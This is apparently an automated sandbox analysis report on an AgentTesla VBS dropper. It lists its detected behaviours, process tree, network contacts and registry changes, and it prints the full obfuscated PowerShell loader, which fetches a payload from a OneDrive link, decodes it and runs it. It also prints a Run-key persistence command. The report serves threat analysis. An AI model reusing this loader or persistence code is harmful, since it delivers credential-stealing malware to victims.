Analysis Overview
SHA256
e1c9b3850958c21be6108aa28a28f7b8f059a0530db99c587fadef7801fa4319
Threat Level: Known bad
The file e1c9b3850958c21be6108aa28a28f7b8f059a0530db99c587fadef7801fa4319.vbs was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Checks computer location settings
Adds Run key to start application
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
outlook_office_path
Suspicious use of SetWindowsHookEx
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
outlook_win_path
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-05 15:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-05 15:12
Reported
2024-06-05 15:14
Platform
win7-20240221-en
Max time kernel
146s
Max time network
152s
Command Line
Signatures
Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1592 wrote to memory of 2188 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1592 wrote to memory of 2188 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1592 wrote to memory of 2188 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2188 wrote to memory of 2936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 2188 wrote to memory of 2936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 2188 wrote to memory of 2936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e1c9b3850958c21be6108aa28a28f7b8f059a0530db99c587fadef7801fa4319.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enriched = 1;Function undinens($Kommanderede){$Vejoverskringensndregulering=$Kommanderede.Length-$Enriched;$Unsublimed='Substring';For( $Vejoverskringens=5;$Vejoverskringens -lt $Vejoverskringensndregulering;$Vejoverskringens+=6){$Tatovren+=$Kommanderede.$Unsublimed.Invoke( $Vejoverskringens, $Enriched);}$Tatovren;}function Silkworks($Jordfyldens){ . ($Capriccettos) ($Jordfyldens);}$Brevteksten=undinens 'ProcrMbarbeo.ypotz VagaiR.vallEmbuslNo,itaForeb/ Durb5Hyp,r. Afdr0Prgn opody( H,nvWGoalei MalinVarekdS,mploS ovlw CetasTiltu OkkupN Pa,tTpu lm A.skr1danie0 Tris.Stads0Disbe; Tig. DroolWgeneriviewpnAs.hy6 Bram4Rigsa;,uccu NonvxXenop6 Erhv4Geant; T ta .ttterEksprvPo,en: Xiph1Gues 2 Funk1 Unhi.Repoi0K ist)Vatic RegneGCiv.le Thumc Tr,nkAssesoEngra/,deka2Reeve0Exant1Broc.0A lvn0Anorm1Hyd o0Trust1bu dl Regn.FSkri.iUric.rVese,eKu.vefImprooTankax Vine/ .ice1Tita.2 F,re1 Mode. Lekt0s rob ';$Outlast=undinens 'S.udeUGe.mes Bid eCash.rMaski-Lisb Ab komgReolpeOrdrenCen stIndkb ';$Skrmformularer=undinens 'Non nhFol,et rustt SpurpChowdsSlagt:La,er/F,rti/LaaneoReexhnHaa.deBegynd Iso rPrecaiB.girvProdie afvi.agterl PrusiAf,alvUnblie unte. 
intacHistoowineymApote/ ,aledD.naio Li.iwConfan BopllEpithoChampaOverrdMetap?Sto.vrKe,eseAlib.sLs eriAllehdBr,de=Usand1Cavi,FAfsluDfinanFForov2Socia0 Chlo5DuctuB S edBDistoDHotel5StnksFIsbry9.ermoF Godk5 Lacc%Natio2Untru1Arumu2Local5Kompl6Son e6Proco&MisgoaScu.uuHerb,tIntorhMininkResknePilloySkill=uddel!BremsA hoveF Va egIn.dk0I,nerNAnteccSimseS AarsNHaan 1Bedron IllaO itrotArteroPodzo5Sag.bcRitua ';$Servitutheftede=undinens ' Bema> ,rst ';$Capriccettos=undinens 'ReguiirefleeOuistxH,mot ';$Tenures='opskriv';$Autokraternes = undinens 'Filame M rvcTuberhBrusqoNeoza Safin%Frot.a KakipChoirpKasmid bawlaTekstteva,uaReans%skr,p\PartiCAdm,re OvernMusi.tKvadrr UbesoU,opoiJarlddLsb,a.GidegAD casrAr ejbBelnn Fodga&Dag n&,choc Tyroge GamicLejeah MarkoForfa alamtB,gge ';Silkworks (undinens 'swerd$AntiggResealTitalointerbTr giaMilitl Phys:eternF leabiBrinklConveiRememgD karrAfmataPard,ndesse=Waggo(SejlrcSkrifmBeeswdDdlk Synd/S,opfc Pr g Recri$Aegi ASamm uDisketRendeo mirak,nterrT,iuna F,ugtSesque DesprSytjenatomieSkandsDenat)Forar ');Silkworks (undinens 'Loise$lifergHuldslHunnioKnbe,bSmlehaSerislspild:VarsoGOffene Unq n NonteOutdirDumstaBe,fil LinniFagblz Sk.vaTelesbP enoiOstrelZ,gomiMarcitUndery Blya=Koje,$SlyngSToxoskAttesr BekemKombifPljniosubanr.epermYde,gu Prytloverla.valur SrineUtopirLandb.Svejss BrnepKr.dilfringic,pryt,aloc(Kl,en$ poinSPolyae flberGalopvShe,tiBundotSkiftuO scotShivehhypoaeDrivvfUrugutSkibieSnitcdTakine tros)Fryse ');$Skrmformularer=$Generalizability[0];$Fribblers107= (undinens 'fje l$ Quadg FrellKry boPrisobdispoaSprnglStrab:HyperST ggeeCarbonGamays ,ecoo,rmgarKarneeInvesr Bioen KlodeBlodt=MekanNKneeheCumbewAer.b-SubtuOKnfalbKaffejAb.ike,uttecPaschtSger. Sv.ghSScenayAnvensNav etkoldkeFurolmAgist.OkkupN Bence Lwoktneom,. OpskWKlatveFemdobFremdCUnsublAnisoi EvigeBlindn eplt');$Fribblers107+=$Filigran[1];Silkworks ($Fribblers107);Silkworks (undinens 'P.oto$,ammoSVict,eDimernbrndessk,ksoAnt,prUntroeTransrThro.nNarreeBadul. 
NonrH edake ,ysaaAntiodHjemmePtysmrConvesRimel[Shimp$SpartO D spuDuodetIntrolRocceaTelevs Tasstoffer]C.nvi=Frems$ CliqBGreasrmargee IncivInkjet C,oseFlskek GnocsTeleft VulpeJenomn Bade ');$Privilegiesystem=undinens 'Navle$UntilSBesmreSvesknTautosGlamoo ,moerBesl e Str,rVarienHvelsePer s.OversD Sul,oEvillwEst nnTrusslAcc,io fetaaAc.iddupfliF D esiOphrslTilfleda.ii(Anath$ ,ncoSSkppekApostr sphamtilskf DrosoVej.brPi atmReautu,redvlOverraH,nharIdenteD,merr.atio, Outb$SadelLHelgaoDumpec ToilaisocolDegeni ,itrzyab,yeSolonsSkjor)Rewid ';$Localizes=$Filigran[0];Silkworks (undinens 'relat$ScammgskarplUnderoBrandbSwiviaNilomlJanet:.laadFArme.o .attr elvmsAfsenoNichonBli.kiHorsen.eftegFaksieP rsonVertisChola=Assoc(UnrolTRappeeSkrnesSkal,tThorg-StrafPKiteda.araltudvikhTa,df Venst$ RhymLSphygocollecByw,laDefrolAffaliExpedz SteneC,codsCrawf)befal ');while (!$Forsoningens) {Silkworks (undinens ' Fois$SubmugOmbrylund,ko yewobPropoaTaarelBalti:NoncoF BarngN.ikatSailceDutchm AttaeDecims Da,otK.tteemacrorLslod= Penr$ NongtPhytorAltisudisoxeHovn ') ;Silkworks $Privilegiesystem;Silkworks (undinens 'MochaSEx ret Pe,aaSincerEncultLan,o-A.iatSNaadel axaeCon reTron pA,red Demar4Qua r ');Silkworks (undinens 'Hors.$CarbogTilbalDominocre tbMoorua,nsnal,otel:SekstFAuditoSp.acrT,ymos,tjpuoLu thn SeksilangrnAnf.egTi,dieSaetnnCatc,sDdsd.=opdag(lovm.T pstieA.ghas R ngt Aero- he ePMyz.saPov,lt TilshTatov Ferr.$helseLUdvejo GordcUndfaaIsbl,lB,rgiiGi.bozLabore,ubsssud.an)Vials ') ;Silkworks (undinens 'Noasu$Microg Predl vil o CentbStofhaCsareltempe:conteS olute Ha,imi aliiConsoeFiskencartogSlanda UlykgUovere Keynd Fini=Re.is$ PseugBevbnl h teoMisexbQuinqa Du,llbrdre:Disr M tnkeiTvivls .empaSav,lpEukarpansgnlFjel,i Sp,reBort,sflske+Rota.+,palt% Blub$SkovaGKundeeTransn F ree xagrSup,ra nhabl PriniUnintzAggrea IsohbSpil.iLovinlSvineiCutlitTestmy orma. 
Har.crapruoCallguN.bronElapst Papa ') ;$Skrmformularer=$Generalizability[$Semiengaged];}$Splitflagene18=294026;$Dasyurid=28720;Silkworks (undinens ' Bely$skolegDytt,lBehavo Bla b FamiaVouchl elet: ,utgTOpholi.ocielcheert DekaaAggellRaakreTurner UncosFrans ,rst=Radio DismoGCaps eSul,ut Alch-Ti.diCSl tloAuerbnH nortEn.ste,jemunHali.tTopfo Inter$Fl.ttLBesnaoLiparcSkuldaDee wlGrundiHjertzsmatte,ahitsCalvi ');Silkworks (undinens 'bisku$DrivrgTryktl UnstoFjerdbReklaaSporelRadbu:WildwIBar,enMarskt obbe passrS,ratnKonveaLevitt U,sviMaudlo,kovsnMus eaBit,elExoe,s Pern Vimp=apoph Pepos[ teroSHeaveyFidussfremft Gla,eYentnmKn,ld.Paon CrinkeoretronFuch,vE.fekeMolesrAf pnt Forh] hot: Sema:nazi.FJor,orKugleoPovelmKogevB Relea Epi.sScissePods,6Phill4Stvl.S Pr.st Platr SjleiGtem.nEksiggIndol(Spill$Plat T.oncliUnanalSubmatStivnaArv klJunnie AmnerKonfesCapit)Lugni ');Silkworks (undinens ' dias$S andg DroglM,sseoC entb ikra,oatmlAkt,t:Eks.rCTorstaSkak tDoleraU,snipDensihBaadey Uns.l TchalApp.aaF.rhrrAfkrvy .ean Filt= frop Nonco[KoksjSAfbe.yTr.pasUds.ytHolyse .urrmUrteg.VelseT Desiet,ldexDenu,tsided.TilsiE Helhn .ljlc BandoChir dUrbaniRegisnGrinnglogwa]Fetia:Ampli: SkueA orsuSpropoC El cIIn ynITynds.Theo GShaheeJinket refuS.melttEpicorChas.i celdn.uleggOv.rp(Subtl$ ScytIHvidenZostetHumane.urghrGetaenKysteaModert Pr,eiFrostoCentrnX.logaHaandlCal ssApp r)Af ol ');Silkworks (undinens 'Putz.$Psy,hgSensilXyl to PirabStat.aSkomalBefra:P eobPReforhMoer oInfo.sIon.sp fedth ftneoCalamrErigeyDragalNeotea.ormltUafgjiYisflnQu.ckg E,em1Mos u0 Sten6 fspn=Uvsen$SignaC veraD.strtSyn.eaNattep OverhInteryAbsenl C,unlD.abeaInterrPar,eyPo tl.KolkhsBilliuSystebRehonsScummtEfterr Unmoi,rundn R mpgDestr(,ngul$Udv kSClimapForcil FedeiS,ivetRu,rifSvlgkl.rflaaNonubg u,deeKadetn TekneVolds1Skyro8 Forh,Gn st$ ta.lDProklaMid,esfa,mey .lenuSkarrrMountiLva udBeton)Sa,co ');Silkworks $Phosphorylating106;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Centroid.Arb && echo t"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
Files
memory/2188-4-0x000007FEF561E000-0x000007FEF561F000-memory.dmp
memory/2188-5-0x000000001B260000-0x000000001B542000-memory.dmp
memory/2188-6-0x00000000024E0000-0x00000000024E8000-memory.dmp
memory/2188-7-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2188-8-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2188-9-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2188-10-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2188-11-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2188-12-0x000007FEF561E000-0x000007FEF561F000-memory.dmp
memory/2188-13-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2188-14-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2188-15-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-05 15:12
Reported
2024-06-05 15:14
Platform
win10v2004-20240508-en
Max time kernel
141s
Max time network
137s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\merrows = "%Creepingly35% -w 1 $Polydactylous=(Get-ItemProperty -Path 'HKCU:\\Decarbonylate\\').Krydsrevidcrr;%Creepingly35% ($Polydactylous)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 3076 set thread context of 4796 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e1c9b3850958c21be6108aa28a28f7b8f059a0530db99c587fadef7801fa4319.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enriched = 1;Function undinens($Kommanderede){$Vejoverskringensndregulering=$Kommanderede.Length-$Enriched;$Unsublimed='Substring';For( $Vejoverskringens=5;$Vejoverskringens -lt $Vejoverskringensndregulering;$Vejoverskringens+=6){$Tatovren+=$Kommanderede.$Unsublimed.Invoke( $Vejoverskringens, $Enriched);}$Tatovren;}function Silkworks($Jordfyldens){ . ($Capriccettos) ($Jordfyldens);}$Brevteksten=undinens 'ProcrMbarbeo.ypotz VagaiR.vallEmbuslNo,itaForeb/ Durb5Hyp,r. Afdr0Prgn opody( H,nvWGoalei MalinVarekdS,mploS ovlw CetasTiltu OkkupN Pa,tTpu lm A.skr1danie0 Tris.Stads0Disbe; Tig. DroolWgeneriviewpnAs.hy6 Bram4Rigsa;,uccu NonvxXenop6 Erhv4Geant; T ta .ttterEksprvPo,en: Xiph1Gues 2 Funk1 Unhi.Repoi0K ist)Vatic RegneGCiv.le Thumc Tr,nkAssesoEngra/,deka2Reeve0Exant1Broc.0A lvn0Anorm1Hyd o0Trust1bu dl Regn.FSkri.iUric.rVese,eKu.vefImprooTankax Vine/ .ice1Tita.2 F,re1 Mode. Lekt0s rob ';$Outlast=undinens 'S.udeUGe.mes Bid eCash.rMaski-Lisb Ab komgReolpeOrdrenCen stIndkb ';$Skrmformularer=undinens 'Non nhFol,et rustt SpurpChowdsSlagt:La,er/F,rti/LaaneoReexhnHaa.deBegynd Iso rPrecaiB.girvProdie afvi.agterl PrusiAf,alvUnblie unte. 
intacHistoowineymApote/ ,aledD.naio Li.iwConfan BopllEpithoChampaOverrdMetap?Sto.vrKe,eseAlib.sLs eriAllehdBr,de=Usand1Cavi,FAfsluDfinanFForov2Socia0 Chlo5DuctuB S edBDistoDHotel5StnksFIsbry9.ermoF Godk5 Lacc%Natio2Untru1Arumu2Local5Kompl6Son e6Proco&MisgoaScu.uuHerb,tIntorhMininkResknePilloySkill=uddel!BremsA hoveF Va egIn.dk0I,nerNAnteccSimseS AarsNHaan 1Bedron IllaO itrotArteroPodzo5Sag.bcRitua ';$Servitutheftede=undinens ' Bema> ,rst ';$Capriccettos=undinens 'ReguiirefleeOuistxH,mot ';$Tenures='opskriv';$Autokraternes = undinens 'Filame M rvcTuberhBrusqoNeoza Safin%Frot.a KakipChoirpKasmid bawlaTekstteva,uaReans%skr,p\PartiCAdm,re OvernMusi.tKvadrr UbesoU,opoiJarlddLsb,a.GidegAD casrAr ejbBelnn Fodga&Dag n&,choc Tyroge GamicLejeah MarkoForfa alamtB,gge ';Silkworks (undinens 'swerd$AntiggResealTitalointerbTr giaMilitl Phys:eternF leabiBrinklConveiRememgD karrAfmataPard,ndesse=Waggo(SejlrcSkrifmBeeswdDdlk Synd/S,opfc Pr g Recri$Aegi ASamm uDisketRendeo mirak,nterrT,iuna F,ugtSesque DesprSytjenatomieSkandsDenat)Forar ');Silkworks (undinens 'Loise$lifergHuldslHunnioKnbe,bSmlehaSerislspild:VarsoGOffene Unq n NonteOutdirDumstaBe,fil LinniFagblz Sk.vaTelesbP enoiOstrelZ,gomiMarcitUndery Blya=Koje,$SlyngSToxoskAttesr BekemKombifPljniosubanr.epermYde,gu Prytloverla.valur SrineUtopirLandb.Svejss BrnepKr.dilfringic,pryt,aloc(Kl,en$ poinSPolyae flberGalopvShe,tiBundotSkiftuO scotShivehhypoaeDrivvfUrugutSkibieSnitcdTakine tros)Fryse ');$Skrmformularer=$Generalizability[0];$Fribblers107= (undinens 'fje l$ Quadg FrellKry boPrisobdispoaSprnglStrab:HyperST ggeeCarbonGamays ,ecoo,rmgarKarneeInvesr Bioen KlodeBlodt=MekanNKneeheCumbewAer.b-SubtuOKnfalbKaffejAb.ike,uttecPaschtSger. Sv.ghSScenayAnvensNav etkoldkeFurolmAgist.OkkupN Bence Lwoktneom,. OpskWKlatveFemdobFremdCUnsublAnisoi EvigeBlindn eplt');$Fribblers107+=$Filigran[1];Silkworks ($Fribblers107);Silkworks (undinens 'P.oto$,ammoSVict,eDimernbrndessk,ksoAnt,prUntroeTransrThro.nNarreeBadul. 
NonrH edake ,ysaaAntiodHjemmePtysmrConvesRimel[Shimp$SpartO D spuDuodetIntrolRocceaTelevs Tasstoffer]C.nvi=Frems$ CliqBGreasrmargee IncivInkjet C,oseFlskek GnocsTeleft VulpeJenomn Bade ');$Privilegiesystem=undinens 'Navle$UntilSBesmreSvesknTautosGlamoo ,moerBesl e Str,rVarienHvelsePer s.OversD Sul,oEvillwEst nnTrusslAcc,io fetaaAc.iddupfliF D esiOphrslTilfleda.ii(Anath$ ,ncoSSkppekApostr sphamtilskf DrosoVej.brPi atmReautu,redvlOverraH,nharIdenteD,merr.atio, Outb$SadelLHelgaoDumpec ToilaisocolDegeni ,itrzyab,yeSolonsSkjor)Rewid ';$Localizes=$Filigran[0];Silkworks (undinens 'relat$ScammgskarplUnderoBrandbSwiviaNilomlJanet:.laadFArme.o .attr elvmsAfsenoNichonBli.kiHorsen.eftegFaksieP rsonVertisChola=Assoc(UnrolTRappeeSkrnesSkal,tThorg-StrafPKiteda.araltudvikhTa,df Venst$ RhymLSphygocollecByw,laDefrolAffaliExpedz SteneC,codsCrawf)befal ');while (!$Forsoningens) {Silkworks (undinens ' Fois$SubmugOmbrylund,ko yewobPropoaTaarelBalti:NoncoF BarngN.ikatSailceDutchm AttaeDecims Da,otK.tteemacrorLslod= Penr$ NongtPhytorAltisudisoxeHovn ') ;Silkworks $Privilegiesystem;Silkworks (undinens 'MochaSEx ret Pe,aaSincerEncultLan,o-A.iatSNaadel axaeCon reTron pA,red Demar4Qua r ');Silkworks (undinens 'Hors.$CarbogTilbalDominocre tbMoorua,nsnal,otel:SekstFAuditoSp.acrT,ymos,tjpuoLu thn SeksilangrnAnf.egTi,dieSaetnnCatc,sDdsd.=opdag(lovm.T pstieA.ghas R ngt Aero- he ePMyz.saPov,lt TilshTatov Ferr.$helseLUdvejo GordcUndfaaIsbl,lB,rgiiGi.bozLabore,ubsssud.an)Vials ') ;Silkworks (undinens 'Noasu$Microg Predl vil o CentbStofhaCsareltempe:conteS olute Ha,imi aliiConsoeFiskencartogSlanda UlykgUovere Keynd Fini=Re.is$ PseugBevbnl h teoMisexbQuinqa Du,llbrdre:Disr M tnkeiTvivls .empaSav,lpEukarpansgnlFjel,i Sp,reBort,sflske+Rota.+,palt% Blub$SkovaGKundeeTransn F ree xagrSup,ra nhabl PriniUnintzAggrea IsohbSpil.iLovinlSvineiCutlitTestmy orma. 
